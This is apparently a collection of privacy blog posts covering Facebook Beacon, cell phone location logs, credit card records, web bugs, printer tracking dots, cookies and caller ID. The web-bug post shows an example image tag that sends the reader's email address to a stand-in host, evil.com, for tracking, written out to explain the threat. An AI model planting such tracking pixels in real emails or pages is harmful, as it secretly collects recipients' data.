Don’t Go Towards the Light – Facebook and Beacon

Recently it has been hard to keep on top of the unfolding problems at Facebook. For those who are unaware of what Facebook is, it is a social networking site popular amongst college students. Of course, this didn’t send them into the netherworld or online privacy issues. No their problems started with their privacy policy. Most importantly what it didn’t say. What it didn’t say is that facebook employees might just be browsing your online activity (that Facebook tracks) for their own entertainment. Now that might some issues but that at least the caveat emptor of privacy policies. In an age where people narrowly tailor their privacy policies, it then falls to the user to think of all the things that a company could do with their information and decide if they want their information used that way before accepting the terms of the service (and many companies change their privacy policy at will and without notice). This is an interesting bent on contracts and informed consent. The contract is being modified at any time and without notice (note: most sites do this, not just Facebook). Furthermore, this is a one sided contract modification (much like the strategy credit card companies use). There is no negotiation and there is probably a serious question as to whether both sides are agreeing on the contract with the new policy (I know of more than one company that get’s people to agree to changes in the employee handbook before they get to see it!). Although concerning, this probably pales in comparison to the recent brouhaha over their Beacon software.

Beacon is Facebook’s advertising platform. Facebook tracks its user’s actions on the web (and off their site). It then posted this information for all to see on their page. This meant, if you had a friend that wanted a new GPS for xmas and you went to buy it for them online, they might see that you just made the purchase on your page (whoops, surprise gone). Worse yet, what if you wanted a GPS and so did someone else and they told you they weren’t buying gifts this year, or were doing something else but you could see they bought one for someone else). This policy was Opt out so it was on be default. When news of this broke, Facebook turned off this feature; sort of. Turns out, they didn’t turn it off at all, they just turned of the reporting part of it. So they were still tracking you, you just couldn’t see they were doing it so visibly. Finally Facebook let users completely opt-out of the system.

Opt-out has become the mantra of the marketing industry (assuming tacit acceptance of their practices). There is an interesting debate about this in the tech. community about if it is better to use Technology to stop such things (NoScript and AdBlocker can be used to block Beacon completely (for the moment) if you have FireFox while others say that policy should be implemented to stop such actions. Finally there are those who feel that consumer pressure will drive this (I got an email from one Social networking site saying how they would never implement such a system (of course there is some bitter irony there since they sent me that email without my permission though a spam posting on another social networking site). Which solution will work best (policy, technology or market pressure) is an interesting debate; each with its own merits. What is clear, is that what is in place now is not working.

A Response To The Re-definition Of Privacy

***The following is a response to this posting (http://privacy-law.blogspot.com/2007/11/is-privacy-still-privacy.html) on the re-defining of privacy. ***


This is a dangerous game of re-definition. Indeed, it is not the benign use of private data that the ideas of privacy law are designed to protect. The misuse of data is the concern and there in lies the problem such re-definitions seek to maneuver around.
In the case of government, 4th amendment protections are there for those who have been wrongly searched and to protect people from intrusive, and intimidating, searches. The promise that "we'll look but trust us, we won't tell anyone or use it against you" is of small comfort. Privacy from a governmental aspect is one of concern based not only on what is happening now, but what may happen in the future. The example I think makes this most clear is Germany in the 1930s. To be Jewish in Germany in 1931 would not be much means for hiding this affiliation. By 1939, hiding this fact was, for some, a matter of life and death. The best protection a citizenry has against such misuses of information is to prevent it's collection in the first place.

In the private sector; the challenges are that the recourse people have is only civil. This creates a problem where an organization may choose to violate its privacy policy (we'll ignore the issues of informed consent, changing contracts without re-affirmation and liberty for now). A good example of this is when .coms in the late 90s would sell their only asset (a user list) upon bankruptcy. People who had their "private" information sold had little recourse since the company that they had given their information to (and thus had the contract with) was no longer around (and even if they were, the fact that they are in bankruptcy ensures that there will be relatively little way for them to receive adequate compensation for the wrong or for the court to provide a disincentive for such actions not to happen again).

My point in these two examples is that this re-definition has far reaching consequences that are somewhat masked by the gentle nature of this re-definition. People need to be sure they understand such implications before we re-write the law to turn the veil of privacy into the hope of non-disclosure.

Gazing across the pond: Privacy in the UK

This summary is not available. Please click here to view the post.

Security or Transparency; different views of privacy

When it comes to dealing with private information, there tends to be two paradigms that I hear espoused most frequently; secrecy and transparency. Those who favor the secrecy paradigm believe that information needs to remain hidden from others. People who subscribe to this paradigm tend to be those who we might have usually considered privacy advocates. From this point of view comes most of the writings that you find on the topic of privacy. Implicit in most discussions of the secrecy view of privacy is that information needs to be kept secret from all other parties.

It is easy to see how to support this view; people point to the tracking information used by government databases, marketing lists and nosey neighbors as evidence of need for privacy. Stories such as how the Nazi’s used public records to track Jews are often used to show the dangers in government consolidation of private information. What is less clear is how the transparency paradigm works.

On the other side of this discussion is the idea that transparency may be the best way to deal security. This is an interesting model since it relies on two things, acquiescence to power and belief in benevolent (or controllable) leadership. In this case the idea is that certain pieces of data need to be inspected as part of contractual obligations, legal mandates or national interests. In such situations, it isn’t that the information needs to be protected from all viewers, but that the dissemination, or use of that data beyond defined limits should be banned or protected though civil litigation.

Some examples of these two views in action are Amazon.com and British Petroleum. Amazon.com has a large set of (sometimes onerous) remote access and data protection measures that are intended to protect the integrity of Amazon.com’s intellectual property. Like may high tech companies, Amazon is concerned that anyone might access it’s data inappropriately and thus has erected major hurdles to accessing this information (Hurdles that exist for those that legitimately want to access it as well).

On the other side of this discussion is British Petroleum. BP has decided to take some of its critical system (like email) and have them hosted by third parties (making them far easier to access from a governmental and legal discovery aspect). BP makes a compelling argument that any of these resources could be “discovered” though governmental powers or legal subpoenas so spending money and resources to “hide” these assets is not very valuable. In their mind, the money it would cost to implement such functions is not worth the cost.

Clearly other organizations take a different view. What is interesting is that this view is a bit like other models we see. From CEO of Sun Microsystems saying “Privacy is dead, get over it” to the explosion of social networking sites like MySpace, Orkut, Friendster and Facebook; it does appear that people do feel ok giving more of their personal information that would have been discoverable though general detective work online.

When might this matter? This week it was discovered that the NSA sought to setup warrantless wiretapping of Americans. This isn’t much of a revelation since the White House stated that this was done in a response to the 9/11 attacks. For better or worse, most Americans accepted this as a trade off of liberty for temporary security, but it now appears that this program was started before 9/11. This is a big shift from what we’ve heard before. Under the secrecy paradigm, this would be quite concerning. Effort would be spend investigating and trying to change laws to roll back this system. On the other hand, if the transparence (or disclosure) paradigm were the idea from the start, there would be no issue, worry or cost to such an action.

Some people might point out that the “transparency” view is really just a pretty package around the loss of privacy. I would point out that there are important distinctions that are part of this view though. All information is not public, it is simply managed differently. Liability would apply to its abuse while the efficient transfer of this information could facilitate the efficient adjudication of issues and protection of citizens. At the root of this view is the belief in differentiating what you want to hide and the benevolence in those that hold this information. Ultimately it’s a matter of trust and accountability. Secrecy has always been about trust, the transparency paradigm shifts the thinking around trust from a “me against the world” to an “us against the others”. Different organizations (and people) are choosing to act on each of these philosophies. Time will tell us, which works best for society.

Third parties are like third wheels; rarely wanted.

Much of our communications these days is sent though third parties. Indeed, it’s pretty hard to think of anything besides face to face communications (or passing notes in gym class) that doesn’t go though a third party. I’d love to use the passing notes example as one that is analogous, but the fact is that it’s only half the story. Most communications (like phone calls, wireless phones, and cell phones) pass though third parties. Those parties can monitor those communications (with varying levels of required legal permission). This isn’t anything surprising since most people know about things like wiretaps. What may be surprising is that in the cases of electronic communications; not only can your communications be intercepted; they are (in many cases) recorded and archived.

This came to many people’s attention during the Koby Bryant case. To give a quick refresher; they were combing though the alleged victim’s text messages to see what she was saying to other people after the alleged incident. The same thing happens with emails.

At issue in each of these cases is the fact that communications are stored on a third party server. That server then monitors, archives or both those communications. This means that those communications are legally discoverable and have a lower level of legal protection than other communications you may have. For example, speaking to someone, is protected since you can’t be forced to incriminate yourself (5^th amendment). Recording a conversations between two parties requires both consent in many states. On top of these, parties involved in such conversations, might fight the discovery of such pieces of evidence, should they exist. On the other hand, third parties have less of an incentive to protect this information. In some cases they actually have reason not to protect it. These reasons can be anything from wanting to maintain good relations with the government (who regulates their communications though licensing), or not wanting to endure the legal costs of protecting someone else’s information.

In each of the presented cases, the take-away is that information that transfers though third parties is out of your control. Just like property (which is the paradigm that the law uses for most personal information) once you give it to someone else (like a phone company or an email service) they have a different (lower) set of incentives to keep that information safe. You should always be aware that when you pass information though others, there is the change that they may read, archive, or even change that information.

Cell Phones – Is that a locator in your pocket or are you just happy to see me?

Cell phones are a nearly ubiquitous these days. Many of us care them with us at all times and give little thought to how the technology works. I won’t go into the legal differences for cell phones vs. land lines (there are drastically different legal treatments of the two technologies when it comes to tapping the “line”) but I do want to talk a little about cell phones as tracking devices.

You’re probably used to your phone working wherever you go and you have probably never given a lot of though to the question of “how does the phone company know to make my phone ring no matter where I am?” Do they send that same ring out to every tower in all the cell networks in the world simultaneously? Of course not. So how does it know to connect your call to you, where you’re at? The answer is that your phone does a “ping” ever once in a while. This ping (much like the computer networking term and the naval term it derived from) is sent from your phone to the closest cell tower to let it know that you’re there. This way the phone company knows where to send your calls when they come in. What you may not know is that the phone companies keep these records. In effect they have a log of where you are, and have been, for years. In Ireland this has sparked a legal battle, though nothing of the sort has erupted here in the US.

Of course this information isn’t all nefarious; but it is necessary for the network, and is now required by the US govt. Thanks to E911 legislation; cell carriers are now required to be able to get coordinates of a cell phone user who calls 911. Of course this technology is equally useful for locating users for other reasons. It hasn’t taken marketers long to see the benefits of this. McDonalds knows that no matter how much it spends on advertising, most of its sales come from people who see a restaurant and drive in (or thru). This is partially why you see fast food restaurants everywhere and why you see competing restaurants near each other. Now think if you could contact those people and send them a message, “stop in the Burger King ahead and get a $0.99 Whopper”.

Consumers are also being sold this technology. In some cases, it’s a mapping service; while in others, it’s a set of personal tracking services. Many of these are sold to parents as a way to keep track of their children. In other cases people are using the technology so they can keep in touch with their friends (Mologogo, MSSLAM).

The take away is that, whether you know it or not, your cell phone is always tracking where you are at. This data is stored for an undisclosed period of time. You are also not able to have this data deleted or keep it from being collected (unless you turn your phone off). Since this data is sent at all times your phone is on, this data provides a very descriptive set of information about where you are, and have been. I’ve known more than a few privacy advocates that use pay as you go cell phones and get new phones every month in order to diminish their traceability. This seems a bit extreme to me though each of us will decide what level of privacy we want. Remember that since this is not considered your data (legally speaking) you should be comfortable with this data being collected, and potentially sold. Some countries (like Germany) have enacted privacy legislation to allow users to request that their data be completely removed from a system (current case deals with computer IP information). Of course this is in response to the European Commissions’ Data Retention Requirements.

Privacy and Privileges: The back door to compelling information disclosure

The 4th, and 14th, amendments ensure that the federal and state governments cannot search though our person affects without our permission. Additionally the 1st amendment protects our freedom of speech as well as our freedom of association (considered part of protected speech). Now there are exceptions to this. The most obvious one is the USA PATRIOT Act that I’ve written about before. This act gives the government the ability to do “sneak and peek” searches of your computer and home without your consent or a warrant. That act aside, in general we either need to consent to a search, or the government needs enough information to issue a warrant to allow a search.

The reason all this matters is that most people rely on the government at some point in their lives (many of us on a daily basis). If you don’t think you do, think about a couple examples: first, the case where the government gives you financial assistance. From tax breaks for children, to student loans, Pell grants, to the Montgomery G.I. Bill funds, from welfare to Medicare or social security, it is highly likely that you have, are or will receive some help from the government. In such cases, the government has used this “non-required” assistance to justify searches that would be unconstitutional in any other aspect. The contemporary example is the legal fight going on right now in San Diego over those who receive public assistance. Part of this legislation gives agents of the state the ability to search people homes to ensure that they are complying. Perhaps you feel that this is a fair trade-off to ensure public aid isn’t abused and that it provides an incentive for people to do what they can to get off of public assistance.

The people who make this argument tend to be those who have done well in life and are not subject to such searches (it’s always easier to legislate what someone else should do). Fear not though, this is where the “privileges” part of this comes in. Though legislation like the REAL ID act (currently being fought in a number of states) data is being aggregated and centralized. So if you drive a car, then that information is collected (and if all states comply, then that will be national, this is why many states are fighting the act and why most private investigators use Drivers Licenses as their preferred way to track people). Even if you forgo the car, but you travel by air, then you are still under surveillance (and remember this is surveillance without any reasonable cause to survey you). As has come out recently, airport screeners were cataloging the information of travelers heading overseas. Information like who they were seeing/staying with, what was in their luggage and even what books they were reading was cataloged and stored. The government is “loosely” kept from sharing this information by the Privacy Act of 1974.
Unfortunately, the Supreme Court ruled in Doe v. Chao that the act mandated damages of at least $1000 is only due if the injured party (the one who had their private information given out by the government) can show actual damages from the leak (of course, finding out that someone shared info that got you on a no fly list, blocked from getting a govt. grant or surveyed by the FBI to your economic determent might be pretty tough).

What is clear in these cases is that our view of individual rights is not evolving with our society. We are continuing to interpret our rights in the same manner that was done tens, if not hundreds of years ago. In a world where “privileges” (like driving, flying and receiving assistance) are an integral part of almost every US citizen (and business’) life, we may want to start thinking about the ways we feel privileges are separated from rights. We all appreciate the freedoms we have here in the US. Many of us believe that our privileges are really just extensions of our right, but at present this is not the case at all. Since many of these “privileges are requirements for us in modern life, what we may be looking at is a loophole that’s being actively exploited to circumvent the 4th, and 14th, amendments.

Is this the right balance to strike? That is a decision for the American people, but I don’t think it bodes well when such actions are taken outside of the public light (the traveler information only came to light as part of a Freedom Of Information (FOIA) suit. I think changing circumstances require US citizens to consider the tradeoffs they make, but when these are forced though programs that are voluntary in name only, or are done out of the public sight, the specter of a meddling government, instead of one, by, of and for the people starts to show up.

Credit Cards: The Pocket Snitch

I once heard that in France they have a saying that if you want to find the scandal with a politician, you should, “Follow the women” , in the States we’d more likely say, “Follow the money”. Setting aside the indications about what is important to each culture’s men, this creates a telling situation about how people go about investigating each other.

When I was younger I took quite readily to credit cards. I enjoyed the ability to spend when I wanted to (a habit it appears our culture has embraced somewhat zealously) while being free from the potential of a lost wallet (to forgetfulness or robbery). What I never considered was what I was giving up for this convenience. For me, my fiscal responsibility kept the dangers of credit card debt from ever becoming the problem it is for most folks in the United States today, but the tracking capabilities are quite real.

For the moment I’m going to set aside the financial implications of someone adding a 2-5% fee on every transaction and how that can raise prices for consumers; I’m going to focus mostly on the privacy implications. Just think about your credit card bill; every month you get a nice list of where you were with locations, dates times and even how much you spent. Looking at these records over time and you get a view of what a person’s life is like. Indeed, advice given to those concerned about stalking advises them not to use credit cards because of their traceability. In many cases, most of us aren’t being stalked by anyone more sinister than marketers and some might reasonably ask, “I’m not worried about staking, why should I care?” The answer is that this valuable form of data aggregation is not only used by marketers and stalkers, but also by law enforcement and governments to spy on their populations. Section 215 of the USA PATRIOT Act, give the US government the ability to look at 3rd party holders of a person’s information (like an email provider or a financial institution). Of course the US government has been monitoring financial transactions of a certain size ($10,000 or greater) for a while though FinCEN. What the USA PATRIOT Act did was increase the ability for the government to get access to these records (and without your knowledge).

From a privacy perspective, it is the potential of abuse of this data that is most concerning. Where you eat and shop, what organizations you donate to and you personal habits are all contained in the records created by these little cards. Cash, on the other hand, “tells no tales and leave no trails”; or so you might think. At least here in the states this is true, though other parts of the world are experimenting with traceable money under the auspices of currency protection.

The bottom line is that money the base unit of transactions in our world. Because of this, the ability to see how a person spends their money tells you a lot about who they are, we need to be careful about who we give this information to. Some people, like Jerry Springer, find out the hard way that financial records can tell tales they would rather not have told (Jerry was caught using a personal check at a house of ill repute while he was a Cincinnati city council member). Both the appearance of data, and it’s absence are things some might be concerned about (if you eat lunch every Saturday at the local pizzeria and one Saturday you don’t eat there, someone might wonder what caused the change in circumstances (especially if an investigations is ongoing about an occurrence on that date)). So the next time you reach for the plastic, just remember that you’re checking your privacy at the counter.

Web Bugs: Is your email infested?

In as earlier post I mentioned Web Bugs. Web Bugs are a piece of code that is virtually invisible to users of the web, but they allow the users of them to track you. How this works is they add an image to an email (most of us are using HTML email these days) and they add this image in a way that you don’t see it. How do they do that? By making it a 1 pixel (the smallest dot on your computer screen) and then making that pixel transparent (so even if you knew which pixel you couldn’t see it). The trick is that the image isn’t an image at all, but a special webpage that is designed to return a clear 1 pixel image while recording and interpreting the query string data in the request. So a regular image might look like this in your web coded email <img height="110" src="http://www.images.com/puppies.jpg" width="120" />; but the web bugged one might look like this: <img src="http://www.evil.com/tracker.cgi?email=you@email.com" width="1" /> The part where it has your email address (you@email.com in this case) is passed to evil.com’s server where they can record your computers address (IP address) the time you accessed the email and then record every time you open that mail. If they wanted to, they could even put a cookie on your machine to track you if you went to another site where evil.com had code running (or images showing like an ad server).

Why do spammers, snoops and stalkers use this kind of tool? Because it works and because they can be sure you got the message. In newer versions on email programs (like Outlook, Eudora, Thunderbird, etc.) users can set up their mail so that images do not show automatically. You may have already seen a page that looks like this:

The reason you have to click on a link to show the images is that it gives you a chance to see if this email is one you want to view before letting a potential spammer know that they now have your email address. Since many web Mail companies (gmail, live, yahoo, etc.) automatically show you HTML emails, the Web Bugs work by default on those sites (which are used by a majority of web users).

Before, I mentioned stalkers. That was not an idle statement. Several web companies now sell you the ability to attach web bugs so that you can tell if someone has received your email. Since the technology is pretty simple, most companies that do email marketing on the web, have built their own Web Bug engines to help them track users. In many cases web filters and anti-spam filters block the sites the bugs attach to but this is only effective as a reactive means of protection. If you are truly concerned about Web Bugs tracking you online, switching your email client to “text only” from HTML email” will ensure that these Web Bugs can’t track you.

The Naked Truth: Are Strip Searches An Invasion Of Privacy?

When I read that in 1978 Chicago was strip searching everywoman who came into their women’s jail I was surprised (to put it mildly). I though, “Are you serious?” This became all the more shocking when it became clear that the woman was at the jail because of unpaid parking tickets. I though that our society was far past the point where that would be considered reasonable. Alas, sometimes we are too hasty with our desire for what we consider “obvious” changes. What made it all the more shocking was when I learned that Washington State, just last year, had its appeals court strike down blanket strip searches. Perhaps this seems obvious to most folks that unless you pose a serious risk or they police have a warrant, they shouldn’t be able to make you go though such an obviously invasive search. This is important not only because of its obvious implications on everyday citizens, but also because this is the core of a privacy discussion (being secure in your “persons, houses papers and effects”). If such things as strip searches are “up for debate” then we can’t possibly have a serious debate about electronic observation and privacy invasion.

It might be valuable to hypothesize about how we got to such a point. As a matter of efficiency, and perhaps as a matter of avoiding bias, the Chicago PD had a policy of strips searching any female prisoner who came into the facility (they had one for all of Chicago at the time). Is it possible that there was so much contraband that everyone was suspect? Was it possible that to search only certain individuals would open the Chicago police up to claims of bias? On the first there is little evidence to support this; on the second (given the Chicago PDs history) it is entirely possible.

So it would seem that the obvious answer to our question as to strip searches being a violation of privacy is self-evident. What is more shocking is how distant what we might think as an average citizen is different from what may be the reality (depending on the jurisdiction you are in). In all, it really comes down to one of those fundamental questions we will ask ourselves (as a society), “How much liberty are we willing to give up pursuit of security?” I won’t make the claim, as Benjamin Franklin did, that “Those who would give up essential liberty to purchase a little temporary safety, deserve neither liberty nor safety.” But I will note that the solution to our criminal problems is probably not in strip searching parking ticket violators. That, I would hope, would be clear to anyone.

Law Enforcement’s Latest Stoolpigeon: Your Laser Printer

Whether you know it or not, almost all color laser printers manufactured in recent years have an important feature not listen on the box; a unique identifier. Much like the MAC address on network cards (covered in more depth in another posting), your laser printer is unique. Since most things we have bought of some value have serial numbers, this might not be so concerning, just as our car has the VIN number etched in several places but no-one is saying cars are giving up their privacy. This is where those analogies end though. The reason is, that your laser printer has a technology in it called “Docucolor” (clearly the people who came up with this aren’t beating Saatchi and Saatchi away for job offers. Docucolor uses a matrix of extremely hard to see yellow dots to identify the printer. Using these dots, they can identify the printer’s serial number. Since color laser printers are only sold though a few channels, this makes tracing down the person who purchased the printer (usually with a credit card) fairly easy to find.

Why is this technology there, well in the first place, it was placed in color laser printers since their quality has gotten so good that the Secret Service (the part of government that’s responsible for protection of the treasury as well as protecting our officials) was worried that counterfeiters could just print money. To be able to trace this activity they had Xerox install this technology. It should also be noted that popular image editing software also inhibits this by looking at images loaded into it and if the image looks too much like currency then the program won’t allow its scan/import.

So the roots of this seem valid enough, the problem is that once the technology is out there, it is that much easier for those who can trace this information to remove the anonymity of those that have made printouts. What makes it more nefarious is that it is done surreptitiously, so people do not know that there is identifiable information in their printouts. Imagine what would have been the outcome if the Dunlap Broadsides would have identified which of our founding fathers signed that treasonous declaration that helped launch this great nation.

As a practical matter, if you are worried about being traced though a laser printer, I would suggest using an inkjet printer (they are pretty disposable these days). Since Docucolor applies a date stamp, uses should consider that using public printers (Universities, workplaces, print shops (kinkos), etc.) will most likely create a record of your printing through security cameras. It’s also possible that between security cameras, and your payment record (unless you pay cash), you may provide a way to identify yourself when you are making these printouts.

Hiding in Plain Sight: Security by Obscurity is Poor Strategy

Though some of you may not have heard the phrase, “Security through Obscurity”; you probably know exactly what I’m talking about. For those who need a more lucid example, allow me to provide one. You may figure you will not end up on any spam email lists if you don’t give out your email address to anyone but friends. You might also think that if you post some pictures of a party you went to online (or a video or a blog) that do one will find it and that it is effectively safe by just being lost in mountains of other information that is out there. This notion has some historical relevance since it allowed the publication of anonymous fliers (think common sense and the federalist papers) as well as avoided government (or private) persecution of individuals (think of trying to track everyone in a civil rights march). In short, blending in to a crowd, or hiding amongst others provided a sufficient level of privacy for most people.

I would hypothesize that the privacy that is hinted at several time in the bill of rights was in the minds of our founding fathers. Few people of the time could have foreseen the information revolution and thus a sufficient amount of protection was provided by blending in. Of course there are negative connotations to this as well (the person who throws a rock from a crowd or fires a shot). The change comes when you have ways to aggregate that information. The assumed level of security disappears. Searches online can find users blogs, face recognition software will soon allow you to search for pictures of people based upon other pictures or tags that have been applied to the photos. Spammers use auto-email name generation and “web bugs” (to be discussed in another posting) to find your email address even if you never gave it to anyone.

The take away from this is simple; don’t assume unprotected information is hidden. Marijuana growers though they were safe using grow lamps within their homes until Mr. Kyllo found out that the police had something called a thermal imaging camera that let them see what was happening in his home. Search engines allow people to look for information that you may have posted (perhaps to a medical online help group). Another example would be that police now take pictures of protesters in crowds for later review (possibly for archiving as well; in some cases they may just want to take the video that you shot as in the Josh Wolf case). The bottom line is that new technology will make information aggregation and discovery much easier than ever before. This has significant social implications (both positive and negative) but from a privacy standpoint the takeaway is simple; don’t rely on hiding in a crowd.

You Are What You Look For – Search Engines And Data Profiling

Recently there was a flurry of search engine companies all touting their changes to their cookie life policies. As Google decided to go to 18 months for its cookie policy, other search providers followed suit or tried to one up them with shorter retention policies. The Thing to understand here is that, although this sounds like a privacy win for consumers, it is really something fairly unimportant. Cookies help sites know who you are. This is especially important for sites that have personably identifiable information (PII) on their users. The major search companies all have email programs that many users that have user’s information in them (both in signing up and in the message contents). Although it is true that people can give false information, the truth is that most people are honest. The new policies say that a year and a half after the last time you visit one of their sites, the cookie that they put on your machine will expire. This means that every time you go to one of that sites properties this year and a half timeline gets reset. So what’s the catch here? Well, remember that the majority of advertising on the net (and advertising is the monetization strategy for most of the web) is run by these companies. This means that if you don’t go to Google (or Gmail, Orkut, etc..) for a year and a half, this cookie still isn’t gone since you almost surely went to a site in that time period that uses Google adWords (full disclosure, Blogger, where this blog is hosted is owned by Google). Yahoo and MSN/Live are much the same (though Google has the vast majority of the search and ad traffic on the net). So although in theory there is a way for this data to go away, in reality it is quite unlikely that it will. Also, remember that a cookie is just an identifier; the real information on you is stored on the company servers. This means if you choose to delete your cookies (all browsers have this options and most can even let you block them) your information is still tracked since the next time you visit one of these sites, the cookie will be put back on your computer. The real key is what happens with the information.

Search/Ad companies really aren’t that interested in tracking “you”, they are interested in tracking who you are. They do this not out of some Orwellian desire to observe and control, they do it because it helps them sell more relevant ads to their clients who pay more money to get their ads shown to the people they want to target. By seeing where you go, what you write in your emails (yes Gmail does an automated search of all of your email) these companies can build a profile of who you are; and what you are interested in. Much a the old market research companies used to pay people to see what was in their pantry and form customer profiles based on this information, Ad companies are now doing the same thing. In and of itself, this may bother people who jealously guard their privacy but most people seem to feel ok with this. Where this can get more concerning is when these data stores are used for personal tracking/monitoring purposes. For example, assume you want to search for bomb making materials while researching a book, or child pornography to help the police track down those that take part in such an act. Such systems may be used by the police/FBI to indicate that you are a person who needs to be watched. The analogy would be the same as someone knowing what you buy and what you’re reading at the library. Prior to the USA Patriot act, such searches by the government were illegal. The reasoning was clear, it was an unreasonable invasion of privacy and the constitution forbid such dragnet searches. When information is gathered and tracked, even for innocuous reasons, it becomes a rich target for those who would want to exploit it (FBI records “mistakenly” ended up in the Clinton White House about Republican rivals in Congress (Filegate)and the K street project used lobbying donations to manipulate political donors to give only to Republican candidates.). Like many things in the privacy world, it is the aggregation of information and then the ability for others to access this information that makes its implications scary. When AOL released a large block of its search data, the implications became immediately apparent.

If you are interested in limiting the information kept by you by these companies, you should think about if you want to allow cookies form those sites. Furthermore, since IP addresses and Mac addresses can be sued to identify a machine, using an anonimizing network, like Tor, would add another layer of protection. There are also a couple of decent article on hiding your search tracks here and here.

PEN registers don’t sell PENs

So to grasp the way that some internet data is traced today (issues for a later posting) it is important that we look at the past (and as it turns out, the present). The past part is the PEN register. A PEN register is a device that was attached to phone company switches and used to record the numbers called and the times those numbers were called. These devices were able to be set up without a warrant as they do not record the contents of the call. This was a wonderfully effective tool against phone harassers and organized crime as well as phone phreakers who would use other people’s calling cards to call all around the world to connect to BBSs (Bulletin Board Systems (the precursor to today’s internet communities)). Since courts found that PEN registers were legal as they didn’t invade on the content of the communications, it can naturally be extrapolated that the same is true for internet traffic (although the courts seem to have been selective in their decisions of what “old” technology relates to the internet (in almost all cases, ruling that your internet communications have far less protections than traditional means of personal speech, land line phone calls, or US mail.

From a privacy standpoint, the connection of the call (or internet traffic) may still contain information that a user might not want to have made available (say if you are a whistle blower calling a reporter or govt. agency or you’re someone calling an AIDS clinic or planned parenthood might strongly insinuate things, even if those assumptions are incorrect). Because of this, many folks in organized crime (and phone phreaks) began using public phones which they could always go to another one and this made tracing much more difficult (the equivalent today would be pay as you go cellular phones though these are monitor-able and the records of their calls are kept so there is still a record (the users of this technology rely on the “security though obscurity” model which we’ll discuss in the future why this isn’t a great way to protect your privacy)). On the internet people use programs like tor to obscure who they are connecting to. This may be of additional concern to people since Congress passed a bill this week increasing the government’s eavesdropping, and snooping, abilities.

In other news: Dateline associate producer Michelle Madigan was outed this week while attending the hacker convention Defcon. Apparently she had gone undercover and the organizers didn’t seem to like the idea of someone trying to get attendees to admit to felonies on camera to shock the “folks in Kansas”. Welcome to a strange turn of the previous topic of the conflict between free speech/free press and privacy.

C is for Cookie

If you grew up with Sesame Street then you probably remember that Cookie Monster (that lovable blue haired cookie eating machine) loved cookies. Alas, the cookies in your web browser are a bit different. For those that are unaware, cookies are one of the ways that a web site can save little bits of information to your computer. These bits of information are stored so that websites can remember things about you.

Although there are other ways to track users online (Flash super cookie, Windows Media Player user ID, XML data islands, etc.) cookies are by far the most common. (Why you might care about this is dealt with in my post about behavior based marketing which will go up next week). The concern for privacy comes in two ways, one is in the cookies on your machine, and the other is what sites do with your cookies. A cookie from a site, by definition, means that you were on that site (unless you’ve placed a fake cookie on your machine to make it look like you were there, which is quite uncommon). Some hackers will try to steal, or corrupt, your cookies to create desired effects (access to webmail accounts for instance). Sites will use the cookies to know when you are coming back to them. Cookies come in several varieties; Session cookies, 1^st party cookies and 3^rd party cookies. Session cookies are cookies that are only good for the time you are using your web browser. Once you close your web browser, those cookies are gone (or expired). 1^st party cookies are cookies that are sent by a site to you machine for that site (cookies should only be returned to the sites that sent them to you (hackers sometimes get around this). 3^rd party cookies are cookies set by sites that you aren’t on, but are showing you material (the most common use of this is advertising on a site that comes from an advertiser but is shown on a different site). All cookies have the ability to set an expiration date after which they are no longer valid. Many sites will set these far off into the future.

Many browsers now give you the ability to manage cookies in various ways though (according to someone I spoke to in internet marketing) most people do not alter their cookies settings so they don’t worry about the small fraction of users that do. Each user can decide what the want to block or allow (making this automatic or having it prompt you each time. Note: prompting sounds like it gives you the most options but is really a pain in the butt, try it and you’ll see). You usually can choose to always block (or allow) cookies from various sites (and some sites won’t let you use them without having cookies enabled). One thing most people don’t realize is that if you choose to block cookies (or allow) from a particular site, that information is stored on your machine. If someone were to search your machine they could tell what sites you had been to (or not) based upon which cookies you chose to block or accept. This information is generally not transmitted across the net (unless your machine is hacked) so someone would need physical access to your machine to obtain this information but it is a trail for those that are concerned about such things).

In general it is important to understand how information is tracked about you and your browsing activities. There are easy ways to limit this tracking and cookies is the primary way websites do this. If you are concerned, you can disable these technologies in most browsers, but many of them greatly diminish your online experience. Examples of these measures are: always clearing your cache, not accepting cookies, not installing plug-ins/add-ons like Windows Media Player, Flash, disabling JavaScript, etc..

I'm Telling: The Conflicts of Privacy and a Free Press

So one of the things that wasn't immediately obvious to me before reading A Right to Privacy is the conflict of a free press and privacy. The best example I have of this is the paparazzi and celebrities. On a level most of us are more familiar we think of it as your best friend who told a secret you told them in 6^th grade. In both cases, information you would have rather kept secret is now very public. The question that this raises is what limits are there on the press' ability to print information (or someone's ability to speak information). In general we have laws that protect against the spreading of untruthful information (slander and liable) and this is one of the major differences between our sense of free speech and that in Britain (where if the speech causes economic harm, you are liable for it, even if it is true). So, there is “free speech”, but not “speech that is free from consequences”, if it is false. Well what if that “speech” is true, but obtained by questionable means? (eaves dropping on your phone calls, reading your emails, searching your trash, etc.) This is where we get into the insisting bits. It may be a low grade move to go ask your neighbors if they notice anything about you(such as John Ashcroft’s TIPS program), or intercept your Internet transmissions (such as the Carnivore System used by the FBI), but how do you protect such information (like being on a DC madam's call list http://www.dcphonelist.com/) or responding to an ad on CraigsList (http://www.encyclopediadramatica.com/index.php/RFJason_CL_Experiment) from becoming public. In general we have the belief that information that we give away freely we don't have an expectation of privacy to but even that theory is flawed as in the case of your social security number to an employer or a tax return (one of the other factors is weather the information is considered of public interest which tends to have impact on celebrities but not on “regular folks”). So how do we draw the line? That is a question that is left up to our legislators. The press is, in most cases, not state run so the 4^th and 14^th amendments don't apply to it. In a society of totally free press and free information, there would be no secrets(think of an Orwellian dystopia where the govt. runs the newspaper). In a society with total privacy, there would be no freedom of speech (think of it like an extrapolated version of Cheney's energy commission).

Caller ID: A Profile In How An Issue Can Change

So by now we are all well acquainted with caller ID; the technology that allows you to see what number is calling you before you pick up the phone. Originally this technology was sold to people at an added cost as a way to screen calls and do away with “crank” calls. Users could “opt out” of the system by dialing *67 before calling a number to show as unlisted on the recipient’s caller ID. The phone companies then sold additional services to permanently block your number (a nice way to get you coming and going; though this is really no different than paying to have your number unlisted). At the time people opposed the idea of caller ID on the grounds that this would be used as a means of discrimination. The examples given were that organizations, like banks, would use the data to route calls from low income areas to call lines with fewer representatives. None the less caller ID became a standard feature on most phone plans and to my knowledge there haven’t been any large cases of such segmentation happening (mostly I would presume since banks have found better ways to segment, such as asking for your acct. number when you call and then routing you based upon the credit rating they have given you).

One important distinction with the caller ID implementation was that although you could block your number when you called someone, you could not block it from the government. This was justified by the need for criminal investigations and finding 911 callers.

